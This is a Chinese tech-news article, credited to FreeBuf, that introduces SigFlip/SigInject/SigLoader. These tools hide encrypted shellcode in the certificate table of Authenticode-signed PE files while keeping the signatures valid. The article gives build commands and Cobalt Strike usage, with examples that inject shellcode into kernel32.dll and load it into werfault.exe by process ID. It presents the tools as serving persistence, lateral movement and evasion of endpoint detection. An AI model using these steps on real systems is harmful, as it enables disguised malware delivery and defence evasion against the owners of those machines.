文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

如何使用SigFlip篡改身份认证码签名的PE文件

2024-12-02 20:35

关注

SigInject组件可以将Shellcode注入至PE文件的[WIN_CERTIFICATE]证书表中,并输出加密密钥以便配合BOF/C/C#加载器(SigLoader)一起使用。SigInject将保存针对PE文件的修改操作,并保证其签名和证书有效性不变。

SigLoader是一个基础加载器,它采用SigInject创建的修改后的PE文件路径和解密密钥作为参数,然后提取和解密嵌入的Shellcode,以供选择Shellcode注入使用。

SigFlip将检查PE哈希是否已成功更改,然后退出以绕过终端针对此类行为的检查。

SigFlip可以用于持久化感染、横向渗透以及命令/代码执行等场景。

注意事项:igFlip、SigInject和SigLoader将以BOF脚本和.NET程序集提供。

工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地:

  1. git clone https://github.com/med0x2e/SigFlip.git 

工具构建/编译

本项目并没有提供预编译的BOF,我们可以使用Mingw-w64来进行编译。如果是.NET,可以使用VS或csc.exe来编译.NET项目(SigFlip、SigLoader);如果是BOF,请按照下列步骤操作:

  1. ➜ i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o 
  2.  
  3. ➜ x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o 
  4.  
  5. ➜ x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o 
  6.  
  7. ➜ i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o 

确保所有的对象文件都存储在sigflip.cna的相同目录下,然后在Cobalt Strike中加载sigflip.cna。

注意事项:预编译的BOF使用的是mingw-64 v8.0.0_3,如果你所使用的mingw-64 >= v9,可能会出现崩溃的情况。

Cobalt Strike

执行程序集:

  1. execute-assembly SigFlip.exe -h 
  2.  
  3. execute-assembly SigLoader -h 

BOF:

当我们在Cobalt Strike中加载sigflip.cna了之后,将会注册两个新命令,我们此时就能够以下列方式使用SigFlip和SigInject了。

工具使用样例

(1) BOF

向msbuild.exe注入随机数据:

  1. SigFlip "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" "C:\lolbins\modified-msbuild.exe" 

向kernel32.ell注入Shellcode:

  1. SigInject "C:\Windows\System32\kernel32.dll" "C:\random\modified-kernel32.dll" "C:\shellcode\cobaltstrike_or_msf_shellcode.bin" 
  2.  
  3. Sigloader "C:\random\modified-kernel32.dll" "DECRYPTION_KEY" "C:\Windows\System32\werfault.exe" 6300 

(2) 执行程序集

向msbuild.exe注入随机数据:

  1. execute-assembly SigFlip.exe -b C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -o C:\Temp\MSBuild.exe 

向kernel32.ell注入Shellcode:

  1. execute-assembly SigFlip.exe -i C:\Windows\System32\kernel32.dll -s C:\Temp\x86shellcode.bin -o C:\Temp\kernel32.dll -e TestSecretKey 
  2.  
  3. execute-assembly SigLoader.exe -f C:\Temp\modified-kernel32.dll -e TestSecretKey -pid 2354 

项目地址

SigFlip:【GitHub传送门

 

来源:FreeBuf内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯